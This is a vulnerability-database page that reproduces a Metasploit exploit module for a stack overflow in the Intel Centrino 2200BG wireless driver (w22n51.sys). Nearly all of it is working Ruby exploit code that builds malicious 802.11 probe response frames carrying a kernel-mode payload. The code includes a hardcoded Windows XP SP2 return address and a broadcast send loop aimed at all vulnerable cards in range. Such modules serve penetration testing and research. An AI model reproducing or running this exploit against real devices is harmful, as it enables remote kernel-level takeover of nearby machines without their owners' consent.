Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

intelcentrino-overflow.txt

🗓️ 17 Apr 2008 00:00:00Reported by Giuseppe GottardiType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 25 Views

Stack overflow in Intel Centrino 2200BG Wireless Driver allows remote code execution in kernel mode triggered by a specific probe response frame

Code
`##  
# This file is part of the Metasploit Framework and may be subject to   
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/projects/Framework/  
##  
  
  
require 'msf/core'  
  
module Msf  
  
class Exploits::Windows::Driver::Intel_Centrino_2200BG_driver_probe < Msf::Exploit::Remote  
  
include Exploit::Lorcon  
include Exploit::KernelMode   
  
def initialize(info = {})  
super(update_info(info,   
'Name' => 'Intel Centrino 2200BG Wireless Driver Probe Overflow',  
'Description' => %q{  
This module exploits a stack overflow in the w22n51.sys driver provided  
with the Intel 2200BG integrated wireless adapter. This stack overflow   
allows remote code execution in kernel mode. The stack overflow is triggered  
when a 802.11 Probe response frame is received that contains multi vendor specific tag   
and "\x00" as essid and essid length element. This exploit was tested with version 8.0.12.20000   
of the driver and an Intel Centrino 2200BG integrated wireless adapter. Newer  
versions of the w22n51.sys driver are provided from Intel to resolve this flaw.  
Since this vulnerability is exploited via probe response frames, all cards within   
range of the attack will be affected.   
  
Vulnerable clients don't need to have their card in a particular state for this exploit   
to work.  
  
This module depends on the Lorcon library and only works on the Linux platform  
with a supported wireless card. Please see the Ruby Lorcon documentation   
(external/ruby-lorcon/README) for more information.  
},  
  
'Author' =>   
[  
'oveRet \'Giuseppe Gottardi\' <overet [at] securitydate.it', # exploit dev  
'skape' # windows kernel ninjitsu  
],  
'License' => MSF_LICENSE,  
'Version' => '$Revision: 4529 $',  
'References' =>  
[  
['URL', 'http://www.kb.cert.org/vuls/id/524332'],  
['URL', 'http://www.milw0rm.org/exploits/3158'],  
['URL', 'http://overet.securitydate.it/stuff/2200BG_8.0.12.20000_drivers.zip']  
],  
'Privileged' => true,  
  
'DefaultOptions' =>  
{  
'EXITFUNC' => 'thread',  
},  
  
'Payload' =>  
{  
'Space' => 224  
},  
'Platform' => 'win',  
'Targets' =>   
[  
# Windows XP SP2  
# 5.1.2600 (xpsp_sp2_gdr.070227-2254)  
[ 'Windows XP SP2 (5.1.2600), w22n51.sys 8.0.12.20000',  
{  
'Ret' => 0x8054eb62,  
'Platform' => 'win',  
'Payload' =>   
{  
'ExtendedOptions' =>   
{  
'Stager' => 'sud_syscall_hook', # don't change this  
'PrependUser' => "\xeb\x02" + # required jump  
"\x85\xe0", # fixed max len  
'Recovery' => 'idlethread_restart',  
'KiIdleLoopAddress' => 0x804dbb27,  
}  
}  
}   
]  
],  
  
  
'DefaultTarget' => 0  
))  
  
register_options(  
[  
OptString.new('ADDR_DST', [ true, "The MAC address to send this to",'FF:FF:FF:FF:FF:FF']),  
OptInt.new('RUNTIME', [ true, "The number of time to run the attack", 1000]),  
OptInt.new('DELAY', [ true, "The number of seconds to sleep between the packets", 1]),  
], self.class)  
end  
  
def exploit  
open_wifi  
  
rtime = datastore['RUNTIME'].to_i  
dtime = datastore['DELAY'].to_i  
count = 0  
  
print_status("Sending probe exploit to #{datastore['ADDR_DST']}...")  
print "[-] "  
  
while (count < rtime)  
wifi.write(create_beacon)  
select(nil, nil, nil, 0.10) if (count % 100 == 0)  
count += 1  
#Exit if we get a session  
break if session_created?  
  
print "#"  
sleep(dtime)  
end  
  
print "\n"  
print_status("Completed sending probe.")  
end  
  
def create_beacon  
bssid = ("\x43" * 6)  
src = ("\x43" * 6)  
seq = [rand(255)].pack('n')  
  
fill = 0xe0 - (payload.encoded.length - 125)  
  
frame =  
"\x50" + # type/subtype  
"\x00" + # flags  
"\x3a\x01" + # duration   
eton(datastore['ADDR_DST']) + # dst  
src + # src  
bssid + # bssid  
seq + # seq   
rand_text(8) + # timestamp value  
"\xa0\x0f" + # beacon interval  
"\x31\x08" + # capability flags  
  
# ssid tag  
"\x00\x00" +  
  
# supported rates  
"\x01" + "\x01" + "\x82" +  
  
# current channel  
"\x03" + "\x01" + channel.chr +  
  
# fixed max len  
"\x85\x7b" +  
  
payload.encoded +  
  
# fill to reach e0 length  
("\x41" * fill) +  
  
# vendor specific tag  
"\xdd" +  
"\x18" +  
"\x00\x50\xf2\x02\x01\x01\x89\x00\x03\xa5\x00\x00\x27\xa5\x00\x00" +  
"\x42\x54\xbc\x00\x62\x43\x66\x00" +  
  
# vendor specific tag  
"\xdd" +  
"\x10" +  
"\x00\x50\xf2\x05\x00\x01\x00\x04\x00\x00\x83\x07" +  
  
# RET address  
[target['Ret']].pack('V')  
  
return frame  
end  
end  
end  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
17 Apr 2008 00:00Current
intel centrino 2200bgwireless driverremote code executionkernel modeprobe responsestack overflowlorcon librarywindows xp sp2mac addressexploit
25